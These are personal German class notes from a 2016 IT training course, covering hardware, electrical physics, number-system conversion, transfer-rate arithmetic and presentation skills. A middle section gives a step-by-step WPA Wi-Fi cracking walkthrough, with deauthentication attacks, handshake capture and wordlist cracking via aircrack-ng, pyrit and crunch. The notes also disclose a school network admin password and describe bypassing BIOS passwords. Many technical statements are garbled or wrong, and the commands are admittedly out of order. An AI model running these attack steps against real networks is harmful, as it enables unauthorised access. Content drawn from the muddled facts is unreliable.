Zusammenfassung vom Unterrricht der Cimdata seit dem 14. 3. 2016 bis zur Gegenwart:

Anmerkung: Im Ordner ist ein noch höherer Informationsgehalt als hier zu lesen ist z.B. bei der Berechnung der Anzahl der Subnetze, die mit einer Subnetzmaske möglich sind.

29.3.2016 Kurze Abfrage des hardwaretechnischen Vorwissens von Markus Liebenow:

Was gehört zum Main-/Motherboard? (z.B. UEFI, PCH, RAID-Controller)

Was gehört zum Netzwerk? (z.B. ATX/AX; Redundanz). Redudanz = Die Tatsache, dass etwas als Information überflüssig ist.

Was gehört zum Prozessor? ( z.B. L1/L2 – Cache; Kühlung; Stack Pointer (Im Steuerwerk) und sie sind von AMD und Intel)

RAM? (z.B. FSB; Kapazität)

SSD/HDD? (Z.B ISE und SATA1 und SATA2 und SATA3)

Gehäuse? (ATX-Bauform, Mini-ATX)

Präsentation vom Prozessor : Was ist er? Er ist eine elektronische Schaltung. Themen: Sockel, Firmen, (AMD/Intel); ALU; Register; L1/L2-Speicher; Kühlung; Grafik.

Der Prozessor gibt als Zentralsteuerung die Nutzereingaben an die übrige Hard- und weiter. Sie sind microcontroller in eingebetteten Systemen. Je kleiner die Litografie, desto mehr Register hat er und leistungsfähiger ist der Prozessor! „Cache ist dafür da.“ steht in meinen handschriftl. Notizen!

-Sockel von Hersteller zu Hersteller verschieden -ALU‘s; Fließkommakomponenten. -Register nicht mit A-Speicher verwechseln; keine längerfristige Ablage von Infos im Register möglich (also, im Steuerwerk). - Das Steuerwerk ist zur Ausführung von Programmcode gedacht; Stack-Pointer. - Befehlstabelle - Funktionsweise: Fetch, Decode, Fetch Operands, Execute (Von-Neumann-Zyklus). - Zuses Z1-Rechner war eine ALU eines Prozessors. ALU: 1. Fetch: Die Adresse des Maschinenbefehls wurde ins Steuerwerk gebracht und Daten in den Speicherkontroller geholt. 2. Decode: Befehlsdecoder schlüsselt Rohdaten in Maschinenbefehle auf. 3. Fetch Operands: Werte und Parameter der Befehle werden in‘s Register und die ALU geladen und Neuberechnung der Daten 4. Execute: Die Befehle werden ausgeführt. (Markus, unser Dozent, fand dies alles logisch gut erklärt.)

Im Speichercontroller gibt es drei Arten von Arbeitsspeicher: L1, L2 und L3.

31.3.2016: 5 Sicherheitsregeln und Vorstellung von Programmen undWebsites: 1. Freischalten; 2. Vor Wassereinschalten sichern; 3. Erden und kurzschließen; 4.Spannungsfreiheit feststellen; 5. Benachbarte, unter Spannung stehende Teile abdecken, oder abschranken.

Bei Hypervisor-Software kann Hardware zur Optimierung eingesetzt werden. Aufgaben vom Marketing: Konzepte, Analysen, instrument, Marktorientierung.

Treiber direkt vom Grafikkartenhersteller runter laden.

Vorstellung von Programm, von Internet-Site:

Ich stellte Blog.Fefe.de vor.

-Was ist Wysips-Technologie? -Bei ClipGrap ist Streamen legal. -Mit Mumin kann man allen Internet-Traffic am Gerät beobachten. -Der Windows-Remote-Desktop ist hauseigen und erlaubt den Zugriff auf einen Server. So wie Filezilla, vermutlich. - Zur IP-Verschleierung bei VPN-Tunneln kann man „Hideme“ verwenden.

6.4.2016: WLAN hacken mit Markus Liebenow: Hub = sendet alles auf alle Ports Switch = Er weiß, wo die Daten hingehen (sendet Paket an den Zielport).

Wie man den Switch in den Hub-Modus schaltet? Indem man ihn mit E-Mails bombardiert!

Northbridge: Kommunikationsschnittstelle zwischen Prozessor, RAM und PCIExpress (Grafik nur zu 50% wichtig .. auf der PCIExpress??).

Southbridge: USB, Audio, Lsp2, Festplatten, Netzwerk und PCI (nicht PCIExpress). Beide liegen unter Kühlkörpern.

Ein RAM kann, je nach Mainboard, einen Dual-Channel-Modus haben (es kann auf einem Mainboard zwei blaue, aber auch zwei schwarze, geben).

Probleme zwischen Mainboard und Arbeitsspeicher? Es gibt lange Listen drüber! Man sollte beim Mainboard-Kauf gleich auf Mainboard-RAM-Kit‘s setzen!

Weil, wenn ein RAM mal nur 1600 HZ haben sollte, obwohl man 2400 Hz raus holen kann, wird auf den schwächeren runter getaktet (Geschwindigkeit Hz hat nichts mit Gesamtspeicher zu tun. Das ist ein Unterschied zwischen Bussen und Frequenzen).

Busse sind Leitungen auf dem Mainboard. Dort gibt es z.B. den Frontzeit-Bus. Hat er 1126 Mhz, ist dies der Taktgeber im System!

Der Takt des Prozessors wird mit dem Multiplikator eingestellt. 200 Mhz FSB * Multiplikator16 = Taktrate 3,2 Gigahertz!

Googlen: „Hertzzahl, Chipsatz, Bus“.

Taktfrequenz und Bus-Breite (in Bit) bestimmen die Geschwindigkeit, mit denen Daten zwischen CPU und dem Chipsatz übertragen werden.

Vom Prozessor (Intel i7660, oder meinem, oder dem auf Arbeit) hängt auch ab, ob er VirtualBox kann (Hyperthreading Voraussetzung).

CAS = Gibt an, wieviel Daten, damit er takten kann.

RAM unterliegt Tagespreisen. Man bekommt Elektronik billiger, wenn man sich ein Gewerbe anmeldet!

Games nicht auf Dual-Channel machen.

Mit 8 Bit kann man 256 verschiedene Zustände ar stellen.

-Der USB Image-Creator (unter Windows) ist ein Linux Live USB-Creator; damit war die Installation vom Kali-Linux möglich.

- In einem DIV-Container unter HTML kann man rein packen, was man will und andere hacken (die Bankdaten).

- WLAN hacken mit aircrack-ng. Airodump; Kismet; Airocrack. Netzwerkstick auf „Monitor“ schalten, um zu „sniffen“. Ab 5000 Paketen fängt man an zu rechnen. SSID = WLAN-Name; z.B. vom Klassen-WLAN ist die SSID „Funkturm“.

Dechiffrieren (ich hatte mir dazu ein seitenlanges PDF dazu erarbeitet und brauchte nur noch jemanden für den Handshake)!!

Standard-PW unter dem Kali-Linux-Live-System: „toor“.

-Bruteforce-Methode: scp -P22220 /home/max/Schreibtisch/password.txt [email protected]:public_html/

Und, im Kali-Linux vom Server zum Desktop: scp -P22220 phantasy 2 @188.68.50.27:public_html/password.txt /usr/share/wordlists/

( Was bei mir bisher klapppte: WPA-Hacking! Aber kein WEP ohne Fremdaufsicht! airmon-ng ifconfig airmon-ng start wlan0 kill 978 kill 1059 kill 1113 airmon-ng check wlan0mon airodump-ng wlan0mon airodump-ng –bssid (mac-Adresse des zu hackenden wlan‘s) -c (channel des zu hackenden wlan‘s) -w (phantasiename) wlan0mon neue shell: aireplay-ng -0 50 -a (mac-Adresse des zu hackenden wlan‘s) -c (Handshake des zu hackenden wlans, in der ersten shell in der 2. reihe mit bssid und station als 2. mac-adresse erkennbar) wlan0mon eine weile laufen lassen stoppen neue shell: crunch 8 8 0123456789 -o pw.lst (die zwei Achter .. acht Zeichen sollte auch das Passwort lang sein. Dann ist Crunch irgendwann fertig.

Dann: airodump-ng –bssid (mac-Adresse des zu hackenden wlan‘s) -c (channel des zu hackenden wlan‘s) -w (phantasiename) wlan0mon wiederholen.

Dann: aireplay-ng -0 50 -a (mac-Adresse des zu hackenden wlan‘s) -c (Handshake des zu hackenden wlans, in der ersten shell in der 2. reihe mit bssid und station als 2. mac-adresse erkennbar) wlan0mon wiederholen.

Aircrack-ng -w pw.lst bla.cap aircrack-ng -w pw.lst (phantasiename).cap und wenn er dann beim Entschlüsseln der passphrase ist, bin ich fast fertig und kann nur hoffen, dass Kali Linux nicht schon wieder abstürzt! ) Wie es allerdings Markus genau gemacht hatte, werde ich noch mal fragen. aircrack-ng –bssid 34:81..(bssid) -a 2 -w ~/home.txt wpaaa-01.cap -a steht für attack mode und -w führt den pfad zur wordlist an. Man kann auhc den absoluten, also den ganzen, pfad eingeben. „dann noch mal Pakete mit schneiden“ airodump-ng –ssid Funkturm –channel 1 –write wlandasgehacktwird wlan0

Achtung, die Zeilen sind wahrscheinlich nicht in richtiger Reihenfolge.. Dann heißt es: Wenn Handshake da ist, den airodump-ng – Befehl abentern !! „Über den Capture lässt er die Passwörter rüberfließen“ ← was immer das heißen mag. airodump-ng -e Funkturm -n 2 -w passwort.txt maa-01.cap Die Cap-Datei wurde vorher mit airocrack erstellt.

Hier, wie man wpa2 + Buchstaben cracken kann: http://brechthold.contempt-it.com/2014/01/05/wpa2-unter-kali-linux/ airmon-ng ifconfig airmon-ng start wlan0 kill 978 kill 1059 kill 1113 airmon-ng check wlan0mon airodump-ng wlan0mon airodump-ng --channel (zielchannel) --bssid (ziel-mac-adresse) --write wpa2-dump wlan0mon

Auf Handshake warten neue Konsole: aireplay-ng --deauth 0 -a (ziel-mac-adresse) wlan0mon airmon-ng stop wlan0mon

Dann sollten wir airodump-ng als auch den Monitor Mode unserer Karte beenden. airmon-ng stop wlan0mon ls -ahl (dann sieht man die cap-datei) pyrit -r wpa2-dump-01.cap analyze pyrit -r wpa2-dump-01.cap -o handshakes.cap strip

Zeigt die Größe der neu erzeugten Datei handshakes-cap an: ls -ahl handshakes.cap pyrit -r handshakes.cap -i /usr/share/wordlists/rockyou.txt.gz attack_passthrough oder: pyrit -r handshakes.cap -i /usr/share/wordlists/password.txt attack_passthrough time pyrit -r handshakes.cap -i /usr/share/wordlists/rockyou.txt.gz attack_passthrough

Dann sollte das Passwort, dass ganz vorne in der Liste steht (beim einfachen testen) schon geknackt sein.

Das war es auch. Zum Testen nächste Woche, mit Markus, wird das auch ausreichen.

Es geht weiter mit: pyrit -i /wordlists/FULLlist.txt import_passwords

Wenn man das Cracktool Pyrit auf Kali-Linux verwendet,, lohnt es sich auch noch, eine starke Grafikkarte im Gepäck zu haben!

Mehr geben meine Notizen nicht mehr her!

- Die Kunst der Täuschung von Kevin Mitnick (Social Engeneering) Sousal endschaing

11.4.2016: USB-Stick machen: WIN USB-CD; Stick: *.iso; PC benötigt.

Greasemonkey: Browsererweiterung, um Browser als Client manipulieren zu können.

Netzwerk von der Cimdata GmbH: \\192.168.0.1

Admin-PW: Cimdata3258

-Guter Virenscanner ist z.B. es/et. -PCI und PCIExpresss-Unterschied. -Mainboard-Versionen(ATX; Mini-ATX) -Unter 600 Watt kein Netzteil kaufen. -Intel i5 1750k. Das k steht dabei für Multiplikator, also, dass man diesen Prozessor takten kann.

- Der Prozessor in meinem Laptop zu Hause ist ein Intel Core i3-3110M 2,4 GHZ 64 Bit, HD-Graphics 4000 GPU (zwei Kerne). Dieser Mobilprozessor braucht DIMM-Speicher zu 1600 Mhz. Die maximale Speicherkapazität ist 32 GHz.

- Der Prozessor meines Arbeitsrechners ist ein Intel(R) Core i5-3570k mit 3,4 Ghz und auch 64 Bit groß. Der Grundtakt läuft mit 650 Mhz und ist ebenfalls eine GPU mit einer HD-Graphics 4000. Die maximale Speicherbandbreite ist 25,6 GHz..

- Overclocking (übertakten). - Grafikkarten (Bauhöhe und Länge beachten, Nvidia GeForce 670 soll gut sein, steht in meinen Notizen vom Mai 2016). - Display Port ist das neue HDMI (und bald auch im USB3) - Bildschirm: Röhre; LCD; Plasma; LED‘s; Amoled-Displays.

7. 4 2016: Physik: Die elektronische Ladung (Plattenkondensator). Mit Anatol Schirmer.

Herr Schirmer „eilte“ innerhalb unserer 4 Tage Physik mit ihm von einem Thema zum anderen, weswegen ich mit meinen Notizen nicht mithalten konnte. Logische Lücken entschuldige ich im Vorraus.

Die elektrische Ladung ist eine Eigenschaft der elementaren Materiebausteine. Elektrisch geladene Teilchen unterliegen der elektromagnetischen Wechselwirkung, die zu den vier Grundkräften der Physik zählt.

Ladung = Q → Couloumb-, C.

Ladung geht nicht verloren. In der physikalischen Stromrechnung geht sie zum Plus-Pol. Die technische Stromrechnung geht anders herum (zum Minus-Pol).

Stromstärke: Wenn viel Ladung fließt + Geschwindigkeit (Weg + Zeit). Je mehr elektronen durch den Leiter flitzen (pro Sekunde?), desto stärker ist der Strom.

Die Kräfte zwischen elektrischen Ladungen bewirken den Zusammenhalt der Atome, Moleküle und Festkörper sowie den elektrischen Strom und sie erzeugen Phänomene wie Gewitter und das Knistern beim Haarekämmen.

Interessant sind Momente, wo sich Glaube und Wissenschaft berühren.

U: R * I .

Formelzeichen: I = Q : t Einheiten: A = C : s

Straßenbahnmotor: 150 A; E-Lok: 1000 A. Blitz: 100000 A.

Bewegte Ladung erzeugt ein Magnetfeld (könnte der Titel zu einem GOA-Song sein)!

Dann ist da so eine Grafik, wo eine elektrische Leitung in einem Blatt Papier steckt und Spannung angelegt ist! Im Querschnitt zu dieser elektrischen Leitung fährt die Kompassnadel wie ein Schiffchen um den Leiter herum.

„Licht ist schneller als Schall“, ach, wirklich? Sarkastisch.

Wenn sich Ladungsplatten auseinander bewegt, baut sich Spannung auf.

Spannung. Def: Spannung ist die Arbeit, die ich brauche, um Ladung von einem Punkt zum anderen zu bringen. Spannung = Arbeit(Joule) : Ladung(Couloumb). U = W : Q; V (Volt) = j: c

Das ist der Plattenkondensator, wenn er nicht an eine Spannungsquelle angeschlossen ist. Bei einer Reihenschaltung addieren sich die Kräfte, die Glühbirne leuchtet heller.

Bei einer Parallelschaltung ist länger Energie da, aber die Lampe leuchtet nicht so hell.

Bei einem Draht mit doppelter Länge gibt es einen höheren Spannungsverlust: Eine Grafik zeigt I1 ohne doppelte Länge, eine andere Grafik zeigt I2 mit doppelter Länge. I2 < I1 → 2* I2 = I1 Doppelte Drahtlänge: Höherer Spannungsverlust. Es gibt zu viel Leitungswiderstand für die Elektronen. E1 = E2 < E1. Widerstand: R = U : I. Ohm = V : A ; ohmsches Gesetz.

Je dicker der Draht, desto mehr nimmt der Widerstand ab.

Widerstände ist überall dort, wo Strom in jedem Leiter fließt. Destilliertes Wasser leitet nicht.

Die elektrische Ladung sorgt für einen Ladungsausgleich. Beim Antrieb zu neuem Zustand der Elektronen stoßen sich gleich geladene ab, ungleichartig geladene an.

Anlaufströme von Maschinen sind nicht zu vernachlässigen! Sie verbrauchen keine Elektronen (die Ladung dar stellen), verbrauchen aber Energie!

Ladungstrennung erfolgt durch Reibung.

Batterien sind nur einmal zu verwenden (Warum das denn??)

Akkus sind wiederaufladbar. Wie unterscheiden sich Akkus von Batterien?

Kapazität, Volt, Anzahl. Strom I = Ladung(12v) : Zeit (700 mAh). 700 mAh in einer Stunde abrufbar (Hinzugefügt am 5.2.2017: Und 8400 Watt, nach W = U * I * t). Dies ist definiert als Ladung, die pro Zeit durch den Leiter fließt.

Aus der Wikipedia: “wenn eine Auto-Batterie hast die z.B. 80Ah (Amperestunden) hat, heißt das, dass die Batterie eine Stunde lang 80 Ampere liefern kann bis sie leer ist. Vorrausgesetzt sie ist komplett voll geladen. .. Also wenn dein Verstärker im Durchschnitt 10 Ampere zieht kannst du mit dieser Batterie (80Ah) deinen Verstärker 8 Stunden lang betreiben. .. Wenn das Verstärkerchen nicht brutalst übersteuert bzw überlastet wird, dann wird er durchschnittlich nicht mehr als 2A aufnehmen dann gilt 44Ah : 2A = 22h”.

Wieviel Ampere hat das übliche Stromnetz? Zitat: “Normalerweise ist der Stromkreis mit 13A abgesichert U*I = P 230V * 13A = 3000W ist pro Stromkreis möglich eventuell sind (verbotener weise) 16A Sicherungen und dann geht 3680W”

Mit folgender Formel kann man die Ladezeit eines Akkus berechnen:

Ladezeit = (Kapazität des Akkus in mAh) / (Ladestrom in mA) * 1.3

Akkus benötigen elektrische Arbeit um sich aufzuladen, daher ist der Multiplikator 1.3 in der Formel enthalten.

Herr Schirmer „eilte“ von einem Thema zum anderen, weswegen ich mit meinen Notizen nicht mithalten konnte. Logische Lücken entschuldige ich im Vorraus.

Folgendes wird ein neues Thema sein:

„Wenn Elektronen sich bewegen“ und weiter... ?? Elektronenmangel: Pluspol. Elektronenüberschuss: Minuspol. .. dies ist die elektrische Arbeit. U (Spannung) = W : Q = Q = W: U und I (Stärke) = Q : t = Q = I * t ist im Ganzen I * t = W : U und W = U * I * t.

Leistung = 10 Kisten Bier auf Tisch; 10 Mal potentielle Energie. Kleiner Mann und großer Mann; beide 10 Kisten auf Tisch. Wehr macht mehr Leistung? Der schneller ist.

Leistung ist die Arbeit pro Zeit.

P = W(Arbeit) : t(Zeit). P * t = U * I * t P(Leistung, Watt) = U * I v* A = W

Ein Heizgerät hat eine Spannung. 220 Volt liegen an und wird von 4,5 Ampere durchflossen. Welche Energie innerhalb einer Stunde abgibt? 4,5 Ampere * 60 Minuten = 270 (Watt?) I * t = c

P = U* I → 220V * 4,5 A = 990 V A = 990 W * 1 = ))= Wh = 0,9 kWh, Kilowattstunden.

W = P * t = 990 Watt * 1 Stunde = 990 Watt * 3600s = Stromzähler zählt in Kw/h. Normale Einheit ist pro Stunde.

Mensch verbraucht 4 kW am Tag für Schwerstarbeit und 1 kW am Tag für Nichtstun.

Wie viel Spannung hat ein Computer? 12 Volt. Wechselspannung lässt sich über längere Strecken transportieren.

Wechselstrom: Wo Polarität wechselt, wo Mittelwert bei Null ist.

Herkunft Gleichstrom:; 2 Platten, die wir auseinander ziehen. Wechselstrom: Lorenz entdeckt.

Sinuskurve T = 1 : f → Hz = 1 : s Eine Sekunde ist ein Hertz. (Bzw. wird die Stromfrequenz gemessen, wieviel Hz in einer Sekunde anliegt, oder?)

Dann wurde das Thema Kondensator behandelt bzw, ist die Kurve ein Beispiel des Kondensators i(t) = i max * sin (wt)

Charakteristika. Energie zur Erzeugung der Leistung: S = U * I P = U * I Scheinleistung ist höher als Wirkleistung.

2. Wenn man Strom in Licht umwandeln will.

3. P = s * cos … ..es ging um den Wirkfaktor …

..Dann etwas mit S = Wurzel von P2 + Q2, was vom Satz des Pythagoras kommen soll ..

Wirkleistungsfaktor: cos phi : Winkel 0,54.

4. S = Energie, um den Humpen hoch zu heben. Rauscheinergie. Schaumenergie.

Weil ich dem Unterricht von Hrn. Schirmer nicht folgen konnte, hatte ich Selbststudien betrieben: Plattenkondensator (Spannung, Feldstärke und Kraft)

Def: Ein Kondensator (von lat. „verdichten“) ist ein passives elektrisches Bauelement mit der Fähigkeit, in einem Gleichstromkreis elektrische Ladung und die damit zusammenhängende Energie statisch in einem elektrischen Feld zu speichern ( aus der Elektrotechnik).

Um das Touchpad während des Schreibens zu deaktivieren (Lenovo Desktop): syndaemon -i 2 -d

Kondensatoren werden in der Regel als Energiespeicher verwendet.

Formelzeichen = c Einheit = F (Farad) Die Kapazität eines Kondensators gibt an, wie viel elektrische Ladung ein Kondensator bei einer Spannung von 1 Volt speichern kann. 1 F = A * s : v = c(couloumb) : v(volt)

Weil ein E-Mangel am Pluspol herrscht, entsteht ein elektrisches Feld, um die Elektronen vom Minuspol anzuziehen.

Ein el. Feld entsteht immer, wenn wir Ladungen trennen, weil ein Elektron will immer zum Proton hin.

F el = E (el. Feld charakterisiert el. Feldstärke, wie stark das el. Feld ist) * q (Ladung, hier ein Elektron). Wenn E groß ist = starkes el. Feld. Feldkr F el = E * q (Eigenschaft eines Teilchens) Schwerkraft F = m (Eigenschaft eines Teilchens) * g Stärke des Gravitationsfeldes.

Ohmsches Gesetz (zur Wiederholung): Wird an einem Objekt eine el. Spannung angelegt, so verändert sich der hindurch fließende el. Strom in seiner Stärke im gleichen Verhältnis (proportional) zur Spannung. U : I = konstant. Diese Konstante ist ein Maß für den Widerstand.

Legt man eine Spannung an, dann ist sie immer im gleichen Verhältnis (proportional) zur Ladung. U ~ t. C = Q : U Formel z. Q = c * U die Kapazität hängt vom Material und den geometrischen Eigenschaften des Kondensators ab. Wenn die Kapazität eines Kondensators von seiner Geometrie abhängt, gibt‘s dazu auch eine formel? ja. C= Epsilon null (Konstante für das E-Feld) * A (Fläche der Kondensatorplatten) : d (Abstand der Platten).

Die Kapazität kann man im Kondensator über das Dielektrikum (ein Nichtleiter, wie Gummi) erhöhen. Dort bildet sich ein entgegengesetztes Feld. E-Feld wird kleiner; c wird größer!

Damit kann man genau berechnen, um wie viel die Spannung größer wird.

Und auch auf elektrische Arbeit bin ich in meinen Selbststudien näher eingegangen.

Weil gerade (27.8.2016) Physik nicht unmittelbar ansteht, werde ich später hier näher drauf eingehen ..

..Trennarbeit.

Die Selbststudie zu Wechselstrom wird auch noch eingefügt. --

Hybrid-ISO‘s werden mit dem Befehl dd übertragen (ab Ubuntu 11.10).

-ssh-Zugang googlen. -Einsteiger-Linux-Kurs Herbert. -Verträge halten ist wichtig im Berufsleben.

12.4.2016: Das Dualsystem, Binärcode, von Dezimal in Binär, von Binär in Dezimal, von Dezimal in Hexadezimal, Hexadezimal in Dezimal, Hexadez to Binär und Binär in Hexadezimal (anschauliche Berechnungen), Speichergrößen.

Eine Dezimalzahl ins Binäre umwandeln: sie muss dazu mit der Zahl, die ihr im Binärsystem am nächsten ist, dividiert werden und der Different wird dann mit der Zahl, die im Binärsystem ihm am nächsten ist, wieder dividiert! Die Zahlen aus dem Binärsystem, die von Nöten waren, um sie von der Dezimalzahl abzuziehen, werden in der Binärhierachie als „1“ eingetragen und der Rest mit Nullen aufgefüllt. Binärzahl von 12 berechnen: 12 – 8 = 4 – 4 = 0

1 1 0 0 8+4+0+0 = 12

Dezimalzahlen in Hexadezimalzahlen umwandeln: 1233:16 = 77,012

1233 77 * 16 = -1232 1 = 1 (letzte Ziffer der Hexadezimalzahl)

77 : 16 = 4,8125

77 4 * 16 = -64 13 = 13 (D)

4 : 16 = 0,25

4 0 * 16 = -0 4 = 4 = 4D1

64 : 16 = 4

64 4 * 16 = -64 0

4 : 16 = 0,25

4 0 * 16 = -0 4 = 40

16 hoch 0 ist eins! Dann Null mal eins sind null. Die hexadezimale 16 ist als Binärzahl 22.

192:16 =

[F0::]64

Hexadezimal in Dezimal:

3F = 3* 16 + 15 = 63

2B = 2 * 16 + 11 = 32+11= 43

Hexadez: Is a shorthand for binary, 4 bits always correspond to one hex number.

Hexadez to Binär:

Dezimal Binär Hex Null: 0 0 0 0 Eins: 0 0 0 1 Zwei: 0 0 1 0 Drei: 0 0 1 1 Vier: 0 1 0 0 Fünf: 0 1 0 1 Sechs: 0 1 1 0 Sieben: 0 1 1 1 Acht: 1 0 0 0 Neun: 1 0 0 1 Zehn: 1 0 1 0 A Elf: 1 0 1 1 B Zwölf: 1 1 0 0 C Dreizehn: 1 1 0 1 D Vierzehn: 1 1 1 0 E Fünfzehn 1 1 1 1 F

For example: 3F: 0011 1111

2AB3 0010 1010 1011 0011

Binär to Hexadezimal: looking the issue in which it contains.. for example ipv6 is clear: the first four bits are a hexadecimal number.. ipv4 also, because there are the first eight bits a decimal number took earlier binary sequence

Binär in Dezimal: Binärtabelle nehmen und mit ihr die gesuchte Zahl ableiten. Den Platz in der Reihenfolge beachten.

1 1 00 0000 128 + 64 = 192

Speichergrößen:

MiB = Mebibyte (Binärbereich) they often sell it with decimal numbers und

2,8 GB * 1024 = 2867,2 MebiByte * 1024 = 2936012,8 KiByte * 1024 = 3006477107,2 Byte * 8 = 24051816858 Bit (aufgerundet).

GB * 1024=Mebibyte * 1024=Kibibyte * 1024=Byte * 8=Bit

Bit, byte, kibibit kibibyte, Mebibit, Mebibyte, Gibibit, Gibibyte, Tebibyte, Pebibyte, Exbibyte .. decimal-based measure for hard drives.. 1gb = 1 mil ki bites.

Übertragungsgeschwindigkeiten:

Mbit = Megabit (Bits per second is in the Dezimal area)

Kilobit: 1 Kb/s = 125 byte/s Kibibit 1 kib/s = 128 byte/s (soll richtig sein). Stimmt das auch? yes Megabit 1 Mbit/s = 1000 kbits/s or 1000000 bits/s Mebibit 1 Mibit/s = 1024 kibits/s or 1048576 bits/s / 1024 = 1024 1024 / 8 = 128 byte 16 Mbit/s = 2 MB/s a bit less .. it's 1.9 MiB/s

It's better to calculate it with 16000000bits/(1024*1024*8.0) = 1.907 … MiBit/s

16 Mbit/s = 16000 kbit/s Rote Aufgaben sind fragwürdig: 200 MiB → 12 Mbit = 150 Sekunden.

Wenn 150 Mebibyte (MiB) 80% von 50 Mbit/s sind: 150* 1024 hoch2 * 8 = 1258291200 bit : 40000000 bit/s = 31 Sekunden. Steht in meinem Heft.

200 MiB → 12 Mbit/s = 150 Sekunden. Wenn 150 Mebibyte (MiB) 80% von 50 Mbit/s sind: Dreisatzrechnen .. 50 Mbit/s = 100% 0,5 = 1 % 40 Mbit/s = 80'% .. i must do 0,5 * 80 = 40 150 * 1024 * 1024 * 8 = 1258291200 bit : 40000000 bit/s = 31 Sekunden. Steht in meinem Heft.

12 Mbit/s = 1,5 MB/s 12 Mbit/s = 12000 Kbit/s 12 Mbit/s = 12000000bit/s

200MB-Datei * 1024² * 8 =167721600 Bit : 12000000 Bit/s = 13,9 Sekunden.

Eine Datei mit 200 MB Größe bräuchte bei einer Übertragung über 12 Mbit/s 13,9 Sekunden!

That's right

Wenn 150 Mebibyte 80% von 50 Mbit/s sind, wird für die 50 Mbit/s erst mal der Dreisatz angewendet: 50Mbit/s = 100% 0,5Mbit/s = 1% 40Mbit/s = 80%

Dann werden die 150 Mebibyte in 1258291200 Bit umgewandelt : 40000000 = 31 Sekunden !!

Und wie viel Mebibyte würden bei 50Mbit durch gehen ?? vermutlich 1258291200 Bit umgewandelt : 50000000 = 25,16 Seconds!!

Mathematik: 8 Bit = 1 Byte 1024 Byte = 1 Kibibyte 1024 K-bite = 1 MiB 1024 Mib = 1 GiB 1024 Gib = 1 TiB 1 GiByte = 1024 hoch 3 Byte 1 GByte = 1000 hoch3 Byte and so on...

1024 Bits = 1 Kibibit 1024 Kibibit/s = 1 Mibit/s 1024 Mibibit/s = 1 Gibit/s and so on..

- Rechner zusammenbauen: Erkundigen - Wiederholung „Grundrechenarten“

- Von binär in Dezimal; von Dezimal in Hexadezimal; von Hexadezimal ins Binäre.

- Kalibrierte Bildschirme für Grafiker (kurz angeschnitten).

- SQL-Injection verbietet Hochkommas. - E-Mail - Injection. - Social Hacking; DDOS-Attacken(kurz); FTP-Logfile; (ws_ftp.log); Phishing; Man-in-the-middle-Attacken. - Parallele und serielle Datenübertragung - LPT-1 = serielle Schnittstelle - Virtualisierung (Stichwort UEFI)

- Es gibt ein Programm vom Hardwarehersteller, wo man im Windows sagen kann, dass man in‘s Bios, oder UEFI, rein will (Startverzögerung). UEFI = Angriffsfläche für Hacker über USB-Treiber und das noch BEVOR DAS BETRIEBSSYSTEM STARTET!!!

- Das Passwort im UEFI, oder BIOS, kann man umgehen, indem man die BIOS-Batterie raus nimmt, oder man schließt das Mainboard kurz! CMOS-Jumper.

- PS2-Schnittstelle Tastatur anschließen → Bios/UEFI UEFI: - Screenlogo deaktivieren; disable Stack driver.

13.4.2016: Kommunikation, mit Birgit Brieger:

- Körpersprache, Parasprache (Tonlage, Lautstärke, Artikulation, Betonung, Dynamik, Pausen, Dialekt); Worte machen nur 7 % aus. Sollen alles „Erfahrungswerte“ von Birgit Brieger sein, oder ????? - Blickkontakt, Lächeln, Kleider machen Leute; Worte „sind das Unwichtigste“. -Kritik an meiner Art der Präsentation: Lauter reden, jemanden raus picken, wenn Klasse nicht mehr zuhört. - Zuhörer: 30 Sekunden-Regel, Reformulieren, Deuten, Bestärken, Fragen stellen (ist eher positiv als negativ). -Informieren: Verständlichkeit, Struktur und Einfachheit (Einleitung, Hauptteil,Schluss) → roter Faden und etwas mit auf dem Weg geben- - Wortpaare verwenden (Pro & Contra; Experten & Laienwissen sind z.B solche Wortpaare)! - Teilzusammenhänge formulieren. - Fach und Fremdwörter sollten verwendet werden (ich würde jedes einzelne einleiten und das deutsche Wort, oder die Redewendung, dabei verwenden) - Nicht mehr als 20 Worte!

- Es gab einen Test, bevor ich kam. Thema war: „Aufbau von Geschäftsprozessen“. - Dann kam die Präsentation über Sprachen (vom 17.4.2016).

- 3-Stufen-Argumentation: Argument heißt, dass man seinen eigenen Standpunkt unterstützt. 1. Es sollte plausibel sein; 2. Rational und 3. Ethisch-moralisch.

- Merkmale der 5-Satz-Technik: Guter, situativer Einstieg; überzeugende Argumentation; zugespitzter, einprägsamer Zwecksatz.

Standpunktformel: 1. Standpunkt benennen: (Ich bin Vegetarier, weil..) 2. Argument: (..wegen Massentierhaltung) 3. Beispiel: (Abschreckung); Bilder zeigen. 4. Fazit: (Durch weniger Fleischkonsum würde Massentierhaltung aufhören). 5. Appell: (Esst weniger Fleisch)!

Arbeitsvorbereitung: 1. Zwecksatz 2. Gute Argumente 3. Guter Einstieg.

Piktogramme sind Zeichen, wie das Fußgänger-Symbol, oder die Aufdrucke von Ecstasy-Tabletten.

- Gruppenarbeit war gewesen: Verbote in den Berliner Verkehrs Betrieben (BVG) aufzulockern. Restaurant/Kantinenbetreiber: Vegi-Essen: Ja, oder nein?? (Argument für Vegetarismus).

- Fragen: Mit Fragen kann man führen (Was, weshalb, wieso, wie, wer, wohin). Es gibt geschlossene Fragen und offene Fragen. -Stefan Verra: Körpersprachenanalytiker.

- Präsentation mit Ahmed: Sprachen

18.4.2016 Mathematik mit Markus Liebenow

Aus Hexadezimalwerten Dualzahlen gestalten.

3 C 3*16 hoch 1 12*16 hoch 0 48 + 12 = 60 (das ist die kompliziertere Cimdata- Variante)

VDSL: 50 Mbit/s down; 48 Mbit/s up. Datei: 700 MiB → FTP Upload – Zeit: 122,33/s und 2,03 /min.

Upload-time für 50mb 50MiB * 1024 * 1024 * 8 = 419430400 bit : 1000 = 419430,4 kbit : 48000 kbit/s = 8,7381333 seconds. Upload-time für 50mb

Upload-time für 700mb 700MiB * 1024 * 1024 * 8 = 5872025600 bit : 1000 = 5872025,6 kbit : 48000 kbit/s = 122,33 seconds : 60 = 2,038833333 minutes

Download-time für 700mb 700MiB * 1024 * 1024 * 8 = 5872025600 bit : 1000 = 5872025,6 kbit : 50000 kbit/s = 117,440512 seconds : 60 = 1,957341867 minutes

Aber für was werden 50mb benötigt? Dann gab es eine Aufgabe, wo die Kosten einer VoIP-Anlage im Relation zu der genutzten Zeit berechnet werden muss, oder so ähnlich (Nur meine Notizen sichtbar, Aufgabenblatt fehlt).

Ermitteln Kosten einer einzelnen Einheit von 2003 2006 Telefoneinheiten der Gäste, wo wir dann auf 0,4 Euro je Einheit gekommen waren, aber die Ausgangslage war mir nicht klar.

Unbedingt noch mal nach schlagen ..

